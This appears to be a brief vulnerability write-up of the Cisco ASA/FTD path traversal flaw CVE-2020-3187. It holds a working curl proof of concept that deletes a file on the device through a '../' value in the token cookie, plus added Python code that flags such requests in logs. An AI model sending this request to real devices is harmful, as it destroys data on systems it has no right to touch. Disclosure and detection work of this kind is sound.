Cisco ASA device arbitrary file deletion vulnerability CVE-2020-3187
Vulnerability Description
There is a path traversal vulnerability in the web services interface of Cisco ASA Software and FTD Software. It stems from the software not properly validating input in HTTP URLs.
Affected Products
Cisco ASA device
Cisco FTD device
Network surveying and mapping
/+CSCOE+/
Cisco-ASA
Vulnerability reproduction
For example, we delete the image at https://xxx.xxx.xxx.xxx/+CSCOU+/csco_logo.gif
Use curl to send the request:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://xxx.xxx.xxx.xxx/+CSCOE+/session_password.html
The logo image is successfully deleted.
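For defenders reviewing proxy or web logs in front of an affected device, the request pattern above can be matched as follows. This is an added example, not part of the original post; the record shape (source IP, path, Cookie header), the helper names and the sample records are constructed assumptions, and it presumes Cookie headers are logged.

```python
from urllib.parse import unquote

# Endpoint and cookie name come from the request shown on this page.
TARGET_PATH = "/+CSCOE+/session_password.html"
COOKIE_NAME = "token"

# Constructed sample records: (source IP, request path, raw Cookie header).
SAMPLE_REQUESTS = [
    ("198.51.100.7", TARGET_PATH, "token=../+CSCOU+/csco_logo.gif"),
    ("198.51.100.8", TARGET_PATH, "lang=en; token=%2e%2e%2f+CSCOU+/x"),
    ("192.0.2.10", TARGET_PATH, "token=5f2a9c1e"),
    ("192.0.2.11", "/other/page.html", "lang=en"),
]


def cookie_value(header, name):
    """Return the value of cookie `name` from a raw Cookie header, or None."""
    for part in header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return None


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_attempt(path, cookie_header):
    """True when the token cookie sent to TARGET_PATH holds a '..' segment."""
    if path.split("?", 1)[0] != TARGET_PATH:
        return False
    token = cookie_value(cookie_header, COOKIE_NAME)
    if token is None:
        return False
    normalised = decode_fully(token).replace("\\", "/")
    return ".." in normalised.split("/")


def flag_requests(requests):
    """Return the source IPs of records that match the pattern."""
    return [src for src, path, cookie in requests if is_traversal_attempt(path, cookie)]
```

A benign session token on the same endpoint is not flagged; only a token that decodes to a path with a parent-directory segment is.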
This post is licensed under CC BY 4.0 by the author.